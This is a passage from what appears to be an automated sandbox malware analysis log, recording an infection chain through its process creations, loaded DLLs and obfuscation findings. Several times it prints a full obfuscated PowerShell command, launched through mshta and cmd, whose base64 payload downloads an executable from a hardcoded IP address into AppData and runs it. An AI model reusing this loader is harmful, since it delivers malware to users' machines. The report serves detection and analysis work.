OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winnit.exe "C:\Users\user\AppData\Roaming\winnit.exe"
Source: C:\Users\user\AppData\Roaming\winnit.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\winnit.exe"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winnit.exe "C:\Users\user\AppData\Roaming\winnit.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP" Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\winnit.exe" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.pdb source: powershell.exe, 00000003.00000002.2180711036.00000000054E4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
PowerShell case anomaly found
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
